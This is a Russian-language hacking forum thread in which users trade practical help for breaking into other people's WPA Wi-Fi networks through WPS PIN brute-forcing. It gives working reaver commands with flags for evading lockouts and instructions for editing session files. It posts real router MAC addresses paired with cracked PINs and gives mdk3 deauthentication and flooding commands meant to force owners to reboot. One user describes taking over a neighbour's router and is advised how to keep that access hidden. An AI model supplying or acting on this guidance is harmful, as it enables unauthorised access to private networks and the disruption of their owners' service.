Веду боевые действия с wifislax-4.3-rc6 как коректно увидеть пароль прямо в боевой машине(wifislax) (windows 7 не полюзуюсь)
Dovbnyak
11.12.2012, 00:00
Всем привет,уважаемые форумчане. Не однократно читал, про откат reaver на версию 1.3 и это помогает. Я использую BT5R3 gnome загрузочный. Там можно откатить? Если да-то как? Заранее спасибо.
Можно и оч просто Установи WPScrackgui там есть как обновление так и автомат... откат на версию 1.3 )
Dovbnyak
11.12.2012, 00:41
Прошу помощи студии) Подобрал пин к точке а место пароля WPA2 вылезла вот такая хреновина http://s55.radikal.ru/i148/1212/0f/d738942e6fcd.png
Веду боевые действия с wifislax-4.3-rc6 как коректно увидеть пароль прямо в боевой машине(wifislax) (windows 7 не полюзуюсь)
Подключайся по пину ))) Допустим у меня с моим адаптером идет програмное обеспичение там есть настройка с вводом WPS PIN И програма автоматичиски законектит к точке по пину если пин подойдет ) и потом можно посмотреть уже реал ключик в настройках сетевого подключения Windows ) REALTEK RTL8187 Wireless LAN Utility ето моя прога для моего адаптера ) А у тебя если нет то скачай из сайта производителя )
arkadiy0
11.12.2012, 18:12
Про прогу спасибо что подсказал))) но всеже в wifislax можно подобное сделать? или там какой модуль туда впихнуть?
Dovbnyak
12.12.2012, 03:11
Про прогу спасибо что подсказал))) но всеже в wifislax можно подобное сделать? или там какой модуль туда впихнуть?
Ну что тебе сказать я етой штукой только раз пользовался да и то года 2 назад помойму там тоже можна откатить но ето уже можеш задать такой вопрос автору одной из зборок wifislax wpa2 помойму ник тут есть пару его постов тамже и его сайт или в гугле набери wpa2.at./толи ua толи ru не помню но точно найдеш вот он тебе и ответит ) но всеже Backtrack 5 лутше больше софта и легченастроить )
Всем доброго вечера. Как-то мне не везёт взламывать точки WPA. Я уже писал выше и вот опять проблема со взломом новой точки. Идёт взлом и через несколько секунд пишет 91,05% и идёт дальше. На пине 12349982 крутится без конца, дальше не продвигается. Пробовал три раза-результат тот-же. Но самый главный вопрос в том, что всегда после М6 пишет WARNING: Receive timeout occurred, не было ни одногт М7. Подскажите что бы это значило. Ламал и с помощью Aireplay тоже. Заранее спасибо.
Dovbnyak
21.12.2012, 06:45
Всем доброго вечера. Как-то мне не везёт взламывать точки WPA. Я уже писал выше и вот опять проблема со взломом новой точки. Идёт взлом и через несколько секунд пишет 91,05% и идёт дальше. На пине 12349982 крутится без конца, дальше не продвигается. Пробовал три раза-результат тот-же. Но самый главный вопрос в том, что всегда после М6 пишет WARNING: Receive timeout occurred, не было ни одногт М7. Подскажите что бы это значило. Ламал и с помощью Aireplay тоже. Заранее спасибо.
Похоже на блок или чтото того что AP заметила перебор то что сразу начинает с 91.5 ето значит что первая половина пина уже есть а ето ваще круть пробуй откатить Reaver на версию 1.3 помогает иногда или пробу ставить задержку между следующим вводом пароля на 20-30 сек параметр d20 число можно уменшить а можно и увеличить все зависит от того ак будет ити перебор ) или можно дать таймаут брута допустим после 10 вводов пароля ривер остановит брут на то время которое задаш ) параметр r 10:30 - 10 ето число ввода пароля после которого оно остановит соидинение а 30 ето 30 сек сна так сказать ! можно попробовать ище параметр
-w мимики windows 7 или -a автоматически виберет все настройки для AP Удачи пробуй !
Dovbnyak, спасибо большое, попробовал всё указанное и никакого результата. А вот откатить reaver не получается, скатал WPScrackgui, а куда его загнать, чтоб установить и потом откатить-не знаю. Пользуюсь загрузочным BT R5 с флешки, а WPScrackgui находится на диске D. Подскажите как решить эту проблему. Завчасно дякую.
http://youtu.be/fMjnoz4sfB8 Wifislax 4.3 rc9 WpsPin generator.попробавал и удалось моментально и правильно сгенерировать пин к роутеру BELKIN и получить wpa2 пароль.http://www.wifislax.com/
cassper666
22.12.2012, 16:07
WpsPin generator.попробавал и удалось моментально и правильно сгенерировать пин к роутеру
Чудесно. А есть отдельная ссылочка на пакет для BT5, а то муторно качать весь дистрибутив из-за одного генератора
Отлично,WpsPin generator пин подбирает очень быстро, но при блокировке по МАС пароль не выдаёт. Жаль.
ломаю точку с впс через ривер. на точке блок 5 минут после пяти неудачных попыток. посмотрев лог я понал что он перебирает 0,05% в 5 минут подсчитав время у меня вышла примерно одна неделя!!!!!! никак это дело не ускорить? блок не обойти?
Вчера попробовал WpsPin generator (wifislax 4.3 final) на 2-х ломаных точках, почему-то ни к одной правильный пин не подобрал...
Вчера попробовал WpsPin generator (wifislax 4.3 final) на 2-х ломаных точках, почему-то ни к одной правильный пин не подобрал...
А попробуй кляксу, по-моему отлично настроена утилитка.
А попробуй кляксу, по-моему отлично настроена утилитка.
Спасибо! Попробую. Клякса это которая minidwep..?
А как полное название этой кляксы, что это?
Спасибо! Попробую. Клякса это которая minidwep..?
А как полное название этой кляксы, что это?
Вот же Клякса
Вот же Клякса
Ничего не понял. Скачал по ссылке кляксу (200 кб), запустил BT R5 с флешки, скопировал скачанную кляксу на рабочий сто, запустил в терминале команду dpkg -i '/root/Desktop/minidwep-gtk-30513-bt5-32bit.deb' и ничего не увидел, никакой кляксы. Что я не правильно делаю?
Ничего не понял. Скачал по ссылке кляксу (200 кб), запустил BT R5 с флешки, скопировал скачанную кляксу на рабочий сто, запустил в терминале команду dpkg -i '/root/Desktop/minidwep-gtk-30513-bt5-32bit.deb' и ничего не увидел, никакой кляксы. Что я не правильно делаю?
Все правильно делаете - вы ее этой командой установили и теперь она должна быть тут:
http://s2.uploads.ru/t/XO3cB.png
Либо через консоль ее запускайте командой: minidwep-gtk
user100, спасибо, после повторной установки в терминале запустил команду minidwep-gtk и открылась клякса. Запустил Scan, прошла зелёная полоска и в терминале BT без конца и края пошло no action time out (здесь точки нет). Но когда остановил этот процесс в терсминале командой Ctr+C, нажал в кляксе Exit-она зависла и не отвечала. Что-то не так?
user100, спасибо, после повторной установки в терминале запустил команду minidwep-gtk и открылась клякса. Запустил Scan, прошла зелёная полоска и в терминале BT без конца и края пошло no action time out (здесь точки нет). Но когда остановил этот процесс в терсминале командой Ctr+C, нажал в кляксе Exit-она зависла и не отвечала. Что-то не так?
Такой глюк возможен, когда меняешь МАС - адрес беспроводного адаптера. После сканирования должен выдаваться список сетей.
Как то так:
https://lh3.ggpht.com/-Yd_Wesutmw4/T7F_uVcYKsI/AAAAAAAAAh8/PqA-71hcN98/s640/minidwep+dictionary+attack.jpg
user100
где расположение, где в этом minidwep-gtk файлы сессии перебора сохраняет.
смотрю запускается заново с места где был остановлен, но всё равно хотелось бы вытащить этот фал как в reaver ....... .wpc
user100
где расположение, где в этом minidwep-gtk файлы сессии перебора сохраняет.
смотрю запускается заново с места где был остановлен, но всё равно хотелось бы вытащить этот фал как в reaver ....... .wpc
Ищите тут:
PHP:
root@bt:/tmp/minidwep#
как восстановить сессию? прюоследний пин был 18825674 потом вырубили свет.
user100 , сейчас запущена клякса и в верхней части есть точки, в нижней- пишет 12:04:44 Trying pin, а в окне терминала движутся надписи: task 14, потом time out и через несколько такиз записей пишет timer1 is out. В окне кляксы идёт взлом (пины). Почему так? И ещё, после каждой перезагрузки приходится по новой устанавливать кляксу. Это нормально, или что-то не то? Заранее спасибо.
как восстановить сессию? прюоследний пин был 18825674 потом вырубили свет.
Сессия в reaver должна сохраняться автоматом после каждых 10 пин. Просто возобновите перебор. Так же можно использовать ключ -p 1882 .
Сессия в reaver должна сохраняться автоматом после каждых 10 пин. Просто возобновите перебор. Так же можно использовать ключ -p 1882 .
если я пишу -п 1882 он считает что это правильная половина ключя и перебирает следующие 3 или надо подождать?
user100 , сейчас запущена клякса и в верхней части есть точки, в нижней- пишет 12:04:44 Trying pin, а в окне терминала движутся надписи: task 14, потом time out и через несколько такиз записей пишет timer1 is out. В окне кляксы идёт взлом (пины). Почему так? И ещё, после каждой перезагрузки приходится по новой устанавливать кляксу. Это нормально, или что-то не то? Заранее спасибо.
Нормальный подбор PIN должен идти так:
http://s2.uploads.ru/t/gcKfi.jpg
Остальное - смотрите в ошибках reaver'a выбрав ключ подробного вывода инфы -vv
Клякса ставиться один раз, если приходиться переустанавливать каждый раз , это косяки live usb
да, вот так идёт, плюс терминал с бегущими надписями task 14, потом time out и timer1 is out. А насчёт косяки live usb-я с ISO записа на флешку. Может в этом проблема?
Вчера попробовал WpsPin generator (wifislax 4.3 final) на 2-х ломаных точках, почему-то ни к одной правильный пин не подобрал...
То же самое.
user_bad
25.12.2012, 16:48
То же самое.
так процесс вероятностный, у меня пин генератор с ходу 2 точки открыл, не известные до того, а на известных не прверял, правда еще 3 ничего не показали но факт интересен, такое видел только на точке ASUS до того у которой пин был 12345670 так интересно что сразу все вышло. WIFISLAX-reaver тоже интересен в версии 4.3
ломаю модем Томсон 08:76:FF:XX:XX:XX ни в каких пин базах его нет? в wificrackgui может кто голянеть пожалуйста
ломаю модем Томсон 08:76:FF:XX:XX:XX ни в каких пин базах его нет? в wificrackgui может кто голянеть пожалуйста
79412988
79412988
ух ты а как где ты эго нашел? это значит мне -p 7941. прописывать?
ух ты а как где ты эго нашел? это значит мне -p 7941. прописывать?
Можешь попробовать в лоб прописать --pin=79412988 Но вряд ли пин именно такой, а вот первая половина может и совпасть.
В /usr/local/etc/reaver лежат сэйвы ривера для кажой точки. Надо найти нужный, открыть его в редакторе, и вписать вместо самой верхней цифры 7935. Потом запустить ривер, подождать, пока он переберет десяток пинов, и посмотреть, перескочит ли процентовка резко на 90%. Если перескочит, то это будет означать, что первая часть пина правильная, и ривер начнет подбирать вторую половину. Если не перескочит - увы, данный пин тебе не подходит.
Как сражаться с 90:F6:52:... -TL-WR841ND (Firmware Version: 3.13.9 build 120201 rel.54965n ,Hardware version: WR841N v6/v7). reaver -i mon0 -b [bssid] -c [channel] -e [essid] -w -r 8:315 -vv -не помогает,только 10 попыток и loced yes до перезагрузки роутера.Или как просмотреть эту проошивку,может надо ему давать подумать,например после 3-х попыток или время задержки другое ?
Как сражаться с 90:F6:52:... -TL-WR841ND
Пробил по маку, попробуй с этими пинами:
http://images.vfl.ru/ii/1356882812/cc32394c/1484113_s.png
Увеличить
у меня блок на модеме на 5 мин и я уже своим ходом дошел до 7000. но мне кажется что что-то не так. как проверить что модем отвечает и ривер в пустую не работает?
sasha030612
31.12.2012, 16:08
Пробил по маку, попробуй с этими пинами:
http://images.vfl.ru/ii/1356882812/cc32394c/1484113_s.png
Увеличить
А где можно пробить пины по mac C8:64:C7
это порога для андроида. качай с сайта он на скрине виден. но в ней нет твоего мака
mr.anonimus
14.01.2013, 17:09
предлагаю в теме писать роутеры (название модель) у которых проходит данный тип атаки , я потом добавлю на главную страницу для упрощения поиска
В продолжение
"alexey1503" вот два:
essid: ASUS
bssid: 90:E6:BA:A2:E5:0A
pin: 17035419
essid: Home
bssid: 40:4A:03:77:43:3B
pin: 78159952
Выложил "Makak":
MAC : 00:26:E8:7A:63:xx
WPS PIN: 15483607
MAC : 84:C9:B2:53:6C:xx
WPS PIN: 54772373
MAC : 00:21:91:F6:35:xx
WPS PIN: 82744458
MAC : CC:5D:4E:51:00:xx
WPS PIN: 53084682
Выложил "user_bad"
zyxel
CC:5D:4E:4E:AE:AB
51565220
И кое что из собственного:
AP SSID: ZYXEL_KEENETIC
AP MAC: CC:5D:4E:2C:15:00
WPS PIN: 28889601
dir300-2
AP MAC: F0:7D:68:A1:17:C4
WPS PIN: 26016573
Еще попались 12345670 и 88264257 - вспомню маки и название роутеров, обязательно отпишусь!
trup_slona
17.01.2013, 19:35
У меня труба с андроидом определяет, что используется протокол WPS, можно даже пин вводить. А как на компе можно увидеть что точка использует WPS?
У меня труба с андроидом определяет, что используется протокол WPS, можно даже пин вводить. А как на компе можно увидеть что точка использует WPS?
Под линух программка wash (wash -i mon0) определяет WPS. Прога входит в состав reaver-wps.
user_bad
20.01.2013, 14:33
e0:cb:4e:48:be:4b
pin 1244046
FC:75:16:CF:9E:4C
pin 46264848
14:A9:E3:00:67:CE
pin 00265744
F0:7D:68:755:3A
pin 03617984
00:26:18:C6:38:44
pin 12345670
14:A9:E3:00:70:C8
pin 00288729
это находилось реавером тогда не было впс генератора, а те что нашлись впс генераторм не выкладываю
Может кто подскажет пин от мака 3C:19:7D:
Нет такого в базе, увы...
Как заставить TP-LINK TL-WN7200ND работать с reaver в BT5R3 с флешки,хендешники ловит на ура,а вот reaver глухо(скорее всего обсуждали не раз,но к сожалению не нашёл)
fgh_2007
26.01.2013, 18:16
Как заставить TP-LINK TL-WN7200ND работать с riaver в BT5R3 с флешки,хендешники ловит на ура,а вот riaver глухо(скорее всего обсуждали не раз,но к сожалению не нашёл)
reaver
Po4ti nub
26.01.2013, 18:38
Пользуюсь программой AirSlax т.к в линуксе ни в зуб ногой и к тому же BT не хочет грузиться. Так вот при попытке взлома впс подбирает один и тот же пароль 12345670 несколько раз и выбивает ошибку. на этом все заканчивается. при повторной попытке то же самое. подскажите в чем проблема? и чуть не по теме: не могу отключать клиента. скоко раз пробовал ни разу хэндщэйка не поймал.
Stranger@
26.01.2013, 22:16
не могу отключать клиента. сколько раз пробовал ни разу хэндщэйка не поймал.
Вначале тоже не мог поймать хендшейк от одной точки(уровень сигнала был -85), пока не увеличил уровень сигнала до -75, тогда сразу поймал и ещё, от телефона с WI-FI хендшейк только почти вплотную можно поймать.
Po4ti nub
27.01.2013, 12:49
попробовал проверить cap файлы других пользователей в другой ветке на наличие ключа. так вот Aircrack выдает мне что в этих файлах нет хэндшейков. а другие пользователи находят ключи в этих cap файлах. получается что у меня нерабочая версия Aircrack? или причина в чем то другом? если можно дайте ссылку на последнюю версию Aircrack
не знаю куда написать отпишусь здесь:
WIFISLAX 4.4x
ASUS RT-N12C1
MAC 50:46:5D:62:1C:4C
WPS PIN: 51504472
На взлом точки ушло 7 дней, потому что был лимит (AP Rating limit)
в итоге 7 дней мозгопарки ривера и 365 дней интернета.
Всем удачи
kukushkindt
29.01.2013, 21:56
Люди добрые, поможите начинающему, кто чем может...
Первый роутер сдался без боя. Спасибо reaver'у. Со вторым вышла загвоздка. Reaver выдал pin и ключ. Вбиваю ключ в wicd, пытаюсь приконнектиться - не даёт. Скармливаю reaver'у тот же pin ещё раз и он выдаёт новый ключ, который тоже не даёт коннекта. Сколько бы раз я не вводил pin, ключи всегда разные и всегда неработающие. Во всех случаях ключ представляет собой комбинацию из 64 символов (0-9, a-f). Как это понимать и как с этим бороться?
Люди добрые, поможите начинающему, кто чем может...
Первый роутер сдался без боя. Спасибо reaver'у. Со вторым вышла загвоздка. Reaver выдал pin и ключ. Вбиваю ключ в wicd, пытаюсь приконнектиться - не даёт. Скармливаю reaver'у тот же pin ещё раз и он выдаёт новый ключ, который тоже не даёт коннекта. Сколько бы раз я не вводил pin, ключи всегда разные и всегда неработающие. Во всех случаях ключ представляет собой комбинацию из 64 символов (0-9, a-f). Как это понимать и как с этим бороться?
Подключайтесь по пину. О том как это сделать в ВТ 5 было написано тут.
А существует ли скрипт , который после получения 10 ошибок WPS менял бы мак на интерфейсе и перезапускал Reaver с новым маком?
mejuliet
09.02.2013, 19:40
Добрый день!
такая пробема. Вчера на ночь поставила Backtrack. быстро начал и сегодня сутра дошел до 45%. Но потом началась проблема, на одном пине завис и начал писать постоянно
[+] Trying pin 50679678
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
[!] WARNING: Receive timeout occurred
[+] Sending EAPOL START request
я его остановила, прогнала просмотр доступных сетей опять - все видит, сигнал под 90-100, запусила reaver опять с места сохранения, добавила и -d 3 и --nack и --dh-small, но он все равно выдает ошибку
В итоге, перезагрузила все и попыталась начать заново, теперь с самого первого пина 12345670 пишет ошибку
для проверки еще зайшла под виндой (седьмая) и попыталась просто подлючиться к сети, а итоге выдало что "ОС не может подключиться к сети".
Подскажите пожалуйста что делать?
з.ы. ноут Lenovo IdeaPad S12, под WiFi вчера работала, все подключалась. До этого сетки ломал под BackTrack 5 и все было хорошо
mejuliet
09.02.2013, 23:34
жди пока точку перезагрузят или в принудительном порядке заставь перезагрузить. mdk3 в помощь для принудительной перезагрузки
аможно поподробнее про mdk3? я погуглила, нашла mdk3 mon0 a -a XX:XX:XX:XX:XX:XX
запустила а оно начало писать
Device is still responding with 500 clients connected!
AP xx:xx:09:39:E3:87 seems to be INVULNERABLE
и так далее..
что не так?
blackbone
14.02.2013, 00:59
Ривером подобрал пин код к сети. Но на ней динамичный пароль, меняется всё время. При помощи тплинк вайрлес ютилити подключился по пинкоду и зашёл на 192.168.1.1. логином и паролем были админ админ. Зашёл в вайрлесс секьюрити и скопировал пароль. Подключение к сети происходит, но без доступа к интернету. Почему нет доступа к интернету?
Ривером подобрал пин код к сети. Но на ней динамичный пароль, меняется всё время. При помощи тплинк вайрлес ютилити подключился по пинкоду и зашёл на 192.168.1.1. логином и паролем были админ админ. Зашёл в вайрлесс секьюрити и скопировал пароль. Подключение к сети происходит, но без доступа к интернету. Почему нет доступа к интернету?
Проверь, проходят ли пинги какого-нибудь ресурса. Хотя бы с уровнем определиться. Мб с dhcp что-то не так, посмотри в настройках роутера, включен ли вообще dhcp сервер.
blackbone
14.02.2013, 12:49
Проверь, проходят ли пинги какого-нибудь ресурса. Хотя бы с уровнем определиться. Мб с dhcp что-то не так, посмотри в настройках роутера, включен ли вообще dhcp сервер.
DHCP включен это точно. Сегодня посмотрю все его настройки. Можете подробнее описать как проверить приходят ли пинги ресурсов и как определиться с уровнем?
Там в меню роутера должен быть пункт, что-то на подобие "Диагностика". Когда его нажать, то сразу идет диагностика канала и результаты выдает в табличке. Там же есть и пинг произвольного адреса в миру. Если пинг пройдет, то роутер с инетом, его надо только взять, ну а если нет - то все телодвижения вообще бесполезны. Можно вайршарком, понюхеть, что там за айпишки в сети летают, даже если DHCP включен, все равно лучше себе статический IP присвоить - меньше палева, на роутерах есть статистика работы DHCP и там будет четко видно, что пользователей больше, чем положено. Ну и конечно вручную вбить в винде IP шлюза (самого роутера), без него инета точно не будет.
Po4ti nub
17.02.2013, 02:50
Всем привет. Взломал вайфай соседа (ну как взломал - помогли в соседней ветке). Все отлично, инет летает. И решил зайти поковыряться в настройках роутера... Когда начал пробовать думал не получится - оказалось логин остался стандартный админ. Говорю сразу-пробую это в первый раз. И в настройках роутера пункт впс выключен. Есть возможность его включить. Стоит ли это делать чтобы потом обезопасить себя когда хозяин сменит пароль? Или при смене пароля впс выключается автоматом после резета? И можно ли вообще включить впс программно не нажимая механической кнопки на роутере?
З.Ы. Простите за столь нубские вопросы..
Всем привет. Взломал вайфай соседа (ну как взломал - помогли в соседней ветке). Все отлично, инет летает. И решил зайти поковыряться в настройках роутера... Когда начал пробовать думал не получится - оказалось логин остался стандартный админ. Говорю сразу-пробую это в первый раз. И в настройках роутера пункт впс выключен. Есть возможность его включить. Стоит ли это делать чтобы потом обезопасить себя когда хозяин сменит пароль? Или при смене пароля впс выключается автоматом после резета? И можно ли вообще включить впс программно не нажимая механической кнопки на роутере?
З.Ы. Простите за столь нубские вопросы..
Удалённо впс не включается, если было выключено в панели администрирования роутера. То бишь, включить его можно только через ту же самю панель. Либо нажав кнопку.
WPS не выключается при смене пароля. Другой вопрос в том, что, когда хозяин роутера будет менять пароль, его может смутить включеный WPS, и он его ручками вырубит. Хотя, если пасс и логин к админке роутера остались стандартными, то, скорее всего, он этого не сделает. В общем, включи, и надейся, что хозяин роутера не подозревает, что такое WPS и что с его помощью можно сотворить =)
взлом wifi: http://www.levinkv.ru/category/wi-fi
взлом wifi: http://www.levinkv.ru/category/wi-fi
http://s019.radikal.ru/i605/1302/d7/ce1362e72ff5.jpg
Не хорошо, однако...
взлом wifi: http://www.levinkv.ru/category/wi-fi
Данеее, норм:
http://3.firepic.org/3/images/2013-02/23/7qrn3ra62puj.png
это находилось реавером тогда не было впс генератора, а те что нашлись впс генераторм не выкладываю
можно поподробнее, что за генератор?
Генератор WPSPin на некоторые точки выдает pin вроде такого 1452XXXX. Подскажите, как подбирать pin, если известны только первых четыре символа? Если в reaver вписываю -p 14520000, то он только этот pin и проверяет, не продолжает диапазон.
-p 1452
-p 1452
Если так написать, то reaver будет перебирать все варианты пина 1452XXXX. Но как предлагается понять, правильная первая часть пина (которая 1452) или нет?
Лично я в таких случая редактирую save-файл reaver`а, чтобы он начал перебирать пины, несколько меньшие, чем искомый 1452. Например, стартуешь с 1447, немного ждешь, пока он переберет до 1452, а вот уже на этом искомом пине вариантов два. Т.е. либо он дальше начнет перебирать 1453, 1454 итд, либо же первая часть окажется верная, и тогда reaver продолжит перебор второй части пина, а первая часть перестанет изменяться. Также счетчик процентов reaver резко перезкочит на 90%, что и означает успешный подбор первой части пина....
Не известно, может правильная, может и нет. Выдано генератором WPSPin по шести символам mac-роутера.
Если способ с редактированием save-файл reaver`а может помочь в этом случае, подскажите как все это сделать?
Открываешь save-файл и меняешь первую строчку в нем на искомый пин, который нужно проверить -10, т.е. в твоем случае на 1442. Вторая и третья строчка файла - должны быть нули. Запускаешь reaver, на вопрос продолжить - отвечаешь yes, перебор должен пойти с 1442 или около того. Ну и ждешь, пока дойдет до искомого 1452. Если пойдет перебирать дальше 1453 1454 итд - значит не он.
PS Забыл написать где искать save-файлы. В bt они в /usr/local/etc/reaver Названия файлов строятся по mac-адресам точек. Тебе нужно выбрать нужный и отредактировать только его.
Понимаю что данные вопросы уже были но повторюсь.
Подбираю одну точку. Уже раз 10-й идет на 99.9% что делать?
И где можно взять базу пинов по макам?
И где можно взять базу пинов по макам?
База есть в последней версии wpscrackgui. Либо под андроид есть программа wpspin. Однако проку от этой базы обычно мало.
beowulf0208
02.03.2013, 22:20
Вчера взломал пароль к Wi-Fi роутеру с включенным WPS, причём это получилось сделать за 3-5 минут. Сначала получил pin, а потом и сам пароль к Wi-Fi. Сейчас задумался, если вдруг пароль к Wi-Fi сменять, то pin как я понимаю останется неизменным. Можно ли зная pin получить пароль к Wi-Fi, т.е. допустим я отправляю роутеру pin, а он мне в ответ присылает пароль к Wi-Fi?
Вчера взломал пароль к Wi-Fi роутеру с включенным WPS, причём это получилось сделать за 3-5 минут. Сначала получил pin, а потом и сам пароль к Wi-Fi. Сейчас задумался, если вдруг пароль к Wi-Fi сменять, то pin как я понимаю останется неизменным. Можно ли зная pin получить пароль к Wi-Fi, т.е. допустим я отправляю роутеру pin, а он мне в ответ присылает пароль к Wi-Fi?
Именно так, все верно понимаете.
Доброго времени
Подскажите, пожалуйста, есть ли возможность запустить reaver на брут пинов в обратном порядке?
Дело в том, что у меня пробрутились 50% пинов и пришлось остановить брут, а сессию сохранить было нельзя. Теперь хотелось бы начать с середины или, что лучше, с конца.
Спасибо.
зы. Похоже, понял. -p 5000 да?
user100, спасибо.
Доброго времени
Подскажите, пожалуйста, есть ли возможность запустить reaver на брут пинов в обратном порядке?
Дело в том, что у меня пробрутились 50% пинов и пришлось остановить брут, а сессию сохранить было нельзя. Теперь хотелось бы начать с середины или, что лучше, с конца.
Спасибо.
зы. Похоже, понял. -p 5000 да?
читай пост #456
Подскажите плиз, как в кляксе скинуть сессию ривера, т.е. чтобы начался перебор с самого начала?
Подскажите плиз, как в кляксе скинуть сессию ривера, т.е. чтобы начался перебор с самого начала?
удалить файл перебора для этой точки.
ищи его в темр/клякса
удалить файл перебора для этой точки.
ищи его в темр/клякса
Спасибо.
Ещё один вопрос: как только начал пользоваться ривером, случайно ввёл -p 1234, даже не зная для чего оно нужно, на одной точке после ~10 переборов скакнуло на 90%.
Сейчас уже 98% но пакеты M5,M6 не идут.
Я правильно понял, что это просто глюк ривера и нужно начинать перебор без -p?
если сразу скакануло, то да - заново
ecли поперебирал 0,05-0,1-0,15 - то мож быть и правильно
начинай конечно без -p не придумывай лишнего,
тем более 1234 в самом начале и если правильно снова прыганёт на 90,90
Dovbnyak
07.03.2013, 20:05
аможно поподробнее про mdk3? я погуглила, нашла mdk3 mon0 a -a XX:XX:XX:XX:XX:XX
запустила а оно начало писать
Device is still responding with 500 clients connected!<br/>
AP xx:xx:09:39:E3:87 seems to be INVULNERABLE
и так далее..
что не так?
MDK3 можно назвать малениким но оч сильн... инструментом для DDos Wi-Fi Если ето можно так обяснить Использую MDK3 не перв день для убийства роутера ))) Тоисть для его перезагрузки егоже владельцем )
Обясню фкнкции
Ключ b засирает ефир фальш точками AP Тоисть в ефире появляется множество точек доступа с китайскими иероглифами или даже можно создать блокнот и в блокнот вписать имена для будущих точек и имена будет брать с блокнота )
будет примерно так MDK3 mon0 (Wlan0) a -t BSSID
Ключ p Ето брут имени AP Тоисть есть скритая точка доступа можно брутить имя по базе слов одним словом брут ESSID
Ключ d почти тоже что делает Aireplay-ng отключает всех клиентов от AP И не дает подключиться пока не будет остановлена атака !
Ключ g Убивает Шифрование WPA будет лупить по точке и не давать подключаться по WPA пока хозяин не переключится на WEP !!!
Ключ m Отправляет в нокаут Функцию TKIP
Ключ a DOS mode Подключает к точке множество типо клиентов етой функции я не обясню целиком но могу сказать что если на точке стоит лимит подключений то 2-3-4 милиона подключений точно не дадут подключится ато может даже заставят зависнуть роутер ) Ну конечно не дадут подключится хозяину если он ище не подключен а даже если подключен то отключим его ключем d и сразу лупим ключ a и радуемся ) ето только часть с того что я знаю ) ну можеш почитать набрав в консоли Бектрек 5 MDK3 и читаеш что да кчему _)
Все легко меняется только ключ тоисть буква подставляется другая для тех кто не понял )
MDk3 mon0 d -t BSSID и оставляем на некоторое время а лутше на недельку и потом ждем звонок в дрерь откройте милиция
Всем привет.Недавно открыл для себя метод WPA,первое впечатление отличное,но "легкие" цели кончились,остальные пока никак.Вопрос:подберется ли пин если у точки не фиксированный канал?
buruznyk
08.03.2013, 20:45
Вопрос:подберется ли пин если у точки не фиксированный канал?
Подберется , если вы не фиксируете частотный канал для атаки. reaver -i mon0 -b 00:00:00:00:00:00 -c 11 -e xxxxxx
Подберется , если вы не фиксируете частотный канал для атаки. reaver -i mon0 -b 00:00:00:00:00:00 -c 11 -e xxxxxx
Использую airslax ничего не прописываю совсем,значит ривер предусматривает что на точке может стоять автоматический выбор канала? Точки которые пытаюсь сломать наз-ся tenda мак адрес начинается C8:3A:35, этот пин 01756401 не подходит,может есть у кого нибудь другие вероятные пины? Пин 46264848 подходит к мак адресам 28:10:7B, BC:F6:85, 1C:7E:E5 точки по умолчанию наз-ся DSL_2640NRU, Home модем длинк
fuckirina
08.03.2013, 23:55
Точки которые пытаюсь сломать наз-ся tenda мак адрес начинается C8:3A:35, этот пин 01756401 не подходит,может есть у кого нибудь другие вероятные пины?
- напиши полностью МАС ...может чё и подберём...
Пин 46264848 подходит к мак адресам 28:10:7B, BC:F6:85, 1C:7E:E5 точки по умолчанию наз-ся DSL_2640NRU, Home модем длинк
- лично у меня на 1C:7E:E5 много раз подходил пин-76229909 ....
buruznyk
10.03.2013, 00:48
Пин 46264848 подходит к мак адресам 28:10:7B, BC:F6:85, 1C:7E:E5 точки по умолчанию наз-ся DSL_2640NRU, Home модем длинк
46264848 этот пин встречается очень часто на точках доступа от разных производителей. У нас в городе все точки доступа, независимо от марки, которые выдает РОСТЕЛЕКОМ при подключении к нету имеют этот пин. Это связано с определенной прошивкой под РОСТЕЛЕКОМ .
buruznyk
10.03.2013, 00:58
значит ривер предусматривает что на точке может стоять автоматический выбор канала?
По умолчанию на всех точках доступа стоит автовыбор канала. Я неоднократно замечал при атаке на точку доступа, она частенько меняет рабочий канал. Поэтому и у ривера по умолчанию стоит автовыбор канала.
- напиши полностью МАС ...может чё и подберём...
С8:3А:35:1C:F2:51,С8:3А:35:54: D2:31,90:F6:52:5B:E1:B6
AstronomGTC
10.03.2013, 12:36
Всем доброго дня! Пару дней пытаюсь с бука ломануть соседскую точку но пока без результатно!(((Задумался приобрести себе альфу. В начале данного топика человек писал что проблема решилась подключением альфы. Но с тех пор прошло много времени и хотелось бы определится в выбором покупки. Подскажите кто юзал Ralink 3070 и Realtek 8187L на каких чипсетах лучше работает роутер? Ось BACK TRACK 5r3. Роутер нужен именно для фрикинга.
fuckirina
10.03.2013, 12:55
подскажет пин от мака 14 :E6:E4
- это полмака...пиши весь...
fuckirina
10.03.2013, 12:58
С8:3А:35:1C:F2:51,С8:3А:35:54: D2:31,90:F6:52:5B:E1:B6
- попробуй эти...если что подойдёт отпишись...интересно...
С8:3А:35:1C:F2:51 - 18970418
С8:3А:35:542:31 - 55588331
90:F6:52:5B:E1:B6 - 60215581
Привет всем. Как командой MDK3 перезагрузить АP ? За рание спасибо.
Dovbnyak
11.03.2013, 03:20
Привет всем. Как командой MDK3 перезагрузить АP ? За рание спасибо.
Напрямую заставить никак а вот если есть клиент и он владелец и знает что надо нажать кнопочку ресет если пропал инет то можно попробовать )
вот тебе пример:
MDK3 mon0 d -t BSSID -e ESSID (Жмем ентер и ждем когда клиент перезагрузит роутер ) Или же спалит его на гале или вибросит в окно Немножко подшутил
Если стоит wpa шиврование тогда пробуем ище так
MDK3 mon0 g -t BSSID -e ESSID (Жмем ентер и ждем когда клиент перезагрузит роутер )
Если есть TKIP то пробуем так :
MDK3 mon0m -j -t BSSID -e ESSID (Жмем ентер и ждем когда клиент перезагрузит роутер )
Вот и все
ПОМНИТЕ НУЖЕН КЛИЕНТ ПОДКЛЮЧЕН К AP
Не знаю пишу туда или нет, но всё же. (адаптер - ALFA AWUS 036H)
Поломал 2 точки через wps - подключаюсь к одной, сначала скорость ~100кб/с - потом пропадает вообще, хотя вот такой сигнал
http://i52.fastpic.ru/thumb/2013/0311/de/1a14e9e7d72fe0f7f165ca967be02dde.jpeg
На второй точке то же самое, сигнал такой
